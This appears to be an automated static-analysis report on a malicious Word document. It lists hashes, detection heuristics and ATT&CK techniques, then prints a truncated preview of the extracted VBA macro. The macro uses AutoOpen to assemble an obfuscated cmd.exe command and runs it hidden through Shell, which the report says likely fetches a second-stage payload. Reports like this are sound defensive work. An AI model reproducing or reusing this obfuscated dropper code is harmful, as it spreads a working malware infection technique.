Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 21c7068e1b87c798…

MALICIOUS

Office (OLE)

169.6 KB Created: 2018-07-26 22:56:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 805d985990b25dbf8acc395119ab5992 SHA-1: 1695ebf9bc211250fcb6db5b4fd07cf3da232f52 SHA-256: 21c7068e1b87c7983f2f6bf489e2e054bd1131b12bb16ca144a8a7e612bedfed
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, which is a common technique for initial execution. The macro attempts to construct a command string and execute it using the Shell function, likely to download and run a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-6821631-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6821631-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30533 bytes
SHA-256: 30f286f4de2dad19edd276f1233a9e2f3cc214dd91115c6e7b96b72dbb6bd376
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wFpcccFKjw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   YtOmM = Oct(lZmjaj + 38212)
   jCFHE = AztdYm
   XFEkF = tMwGwP
   vdpOGH = Cos(zEEad)
   FdzPY = CDbl(114)
   PaRrYD = NOuiW
XamlKvnSw = "" + BbrqXfTL + QZMaMTsho + CVar("cm") + JCoTKQZhUXwUi + uEotZCuwjLMMUH + CzKzrhLHn + TPzIEWpztLj + jOkijirZLHl + McwqV + LuRfsuktVu + wahhHnpqrC + NKOUj + kzJmTp + vwctTHQdldz + qWLVOfjB + PEJadlmYB + kcJUTI + ziVaOQjw + Ijpurvc + rwdlBMbcYWs + BrbiZ + vjNnFJwa + zTpMuild + AJPanljLiEC + RSTriTGDMwH + EsIajz + dGpcwPoN + prnmpNbwLI + FQaitMMTWu + PiYJIEC + YathLoJZP + nkcuzds + fiNzHw + HBSVucQ + jOYTiTGfI + pWfEhpA + hfSKpN + ZKWudNIPd + iYApQ + ZqZNw + BHpWLT + WQoahQozdjY + QlYriaifYXDMFi + iEsUzcc
   SQzQr = Oct(uCOpz - ZrLwoI)
   OPKpDt = Cos(oLNMq)
Shell@ XamlKvnSw, 0
   LTpUi = CLng(XuVCOB / aEzLlQ / 2426 - AVpMT)
End Sub


Attribute VB_Name = "OYDllmHzIvM"
Function CzKzrhLHn()
On Error Resume Next
mTcHumvQHc = "d        " + "       " + "/c        " + "       c"
zWpfI = RfGddi
   AaKbrd = Hex(211325035)
iJGciRGPO = "MD.ExE  " + "/v:/" + "C  " + CStr(Chr(pKhQAJzMwo + iTndijL + 34 + BDCPqCjGBpMJ + mzHwrowraCMSvp)) + "  Set"
TNPzk = 10
   QADmaj = Sgn(PNIKw + dDoJA)
   fSkTvw = Atn(VRsBj * LNcbK - QZvNj - YmoQZ)
PVrwE = "   }`$,=-\" + "/\__-/" + "/-" + "/-\__ -" + "\\_-/" + "-\_-_///_ "
jaTSmTa = "_/_/"
iPzPk = CLng(iifwVG)
   CPaNwp = 976
XjwKwBALrJs = "-\\_" + "\/\-" + "-/- -_/" + "\-\_\_-_" + "\/-/ \-_/" + "--\/_\-\" + "//_ /_-_"
FBzWJR = 3930
tCiQERCZm = "-_\/\_\-\" + "// \" + "\\-" + "/\_"
qoqOrH = "-_-/-/_/ " + "__/" + "-\_//\" + "/_\-\- " + "/"
CzKzrhLHn = mTcHumvQHc + iJGciRGPO + PVrwE + jaTSmTa + XjwKwBALrJs + tCiQERCZm + qoqOrH
   EfSwQM = Tan(Tjmtws / qdkYpM)
End Function
Function TPzIEWpztLj()
On Error Resume Next
LirNkV = Rnd(7)
   aGiBz = 69
ZjoJvwszzL = "/_\-/_--"
MUcSlc = "_/\\" + "-\ "
NWfJfd = ChrB(76432 * ZJsZs - 29193 / iwwHRY)
   zKZTp = 123258800
tatOTINFMqF = "/-\\-"
AiZcqc = ChrB(93884 - hriob)
   ULbEDB = Fix(oaOQh - FKzEzQ + 83930 * TmoBBs)
ahLBa = "_-_"
KiVOFH = EWrfq
   avzwX = 1
   pLlBBY = CCJvNf
qfilYjOnizT = "\_/\-" + "/" + "/ -/_"
Pjikjr = "\-/\__-\" + "-//\ _\\" + "_/\_--" + "_///-\ \/" + "/\_"
lzCkz = ZLETZO
GzOCkaaiAr = "\_--" + "\-/-/_ _\\" + "\//-_" + "/" + "/-_--\ /-_" + "\/-_/__\\-" + "/- -/"
TPzIEWpztLj = ZjoJvwszzL + MUcSlc + tatOTINFMqF + ahLBa + qfilYjOnizT + Pjikjr + GzOCkaaiAr
   zYvwPs = Atn(4)
   cTJoiM = UJaNlZ
   ChUUTj = CInt(EjaBU)
End Function
Function jOkijirZLHl()
On Error Resume Next
rbcAQ = Tan(5)
   ScYuTJ = 2570
fXqhLzU = "\_\_\/" + "-_/-\-" + "/ _--"
uhYtHh = 9
KjdMDSSnsd = "/" + "\/" + "\/_\_--/_" + " \--_\" + "/--/_\" + "\_/_}/" + "/\-_/"
AEAaKiVNzqT = "-_\_/-_-\}"
jBFVS = Round(wIZVGo)
TjAPUMvZwN = "_-\/\\/-_\" + "_/-" + "/_{\-\" + "//-_-" + "/__" + "\/" + "\-h/\-"
YHULIR = Int(621)
   dFuwUj = 9754
SwXiPibpcK = "\_" + "___-/\\//-"
jfsqE = Cos(DqjYQ)
   IWjHr = 2385
CZMqJRA = "c-/_" + "\_" + "_/-/\-_/\-" + "t"
sOhjAb = "/\_" + "-\\\__/-/" + "_-/a/_/" + "_" + "/\_"
CpCRaI = "_\---\\-"
jOkijirZLHl = fXqhLzU + KjdMDSSnsd + AEAaKiVNzqT + TjAPUMvZwN + SwXiPibpcK + CZMqJRA + sOhjAb + CpCRaI
   fhRrlT = Ooosu
   vrACh = wjoqz
End Function
Function McwqV()
On Error Resume Next
fjBZwF = 8043
VMHDuH = "c/-_--_\_"
FJXZCr = sTcXI
fUizaOVYIG = "/_\" + "\//\}-_"
vwMwlA = djVQCW
   mjSCi = Int(85757698)
   jPzGDH = bKTBE
miGFXf = "/-" + "_///\" + "-_" + "\\\_;_\-_/"
HdYfOz = "-__" + "\-//"
EGjuCn = CBool(24)
   Gcbzi = Rnd(FBnNU)
ficunVMBkUz = "-\/k/" + "__-\\--\/" + "\-_/_a" + "--/\/\_-_" + "_/\"
iqLJYf = kbOkIT
   BSiDbM = Rnd(49375 / 13961)
   RHjzi = 50289889
KNZZzojiK = "\-_e-\_\/" + "/_\/_-_" + "/-\r\_"
Pluld = ChrB(8)
   wLTQk = 70
EavzWp = "\/-_///"
McwqV = VMHDuH + fUizaOVYIG + miGFXf + HdYfOz + ficunVMBkUz 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.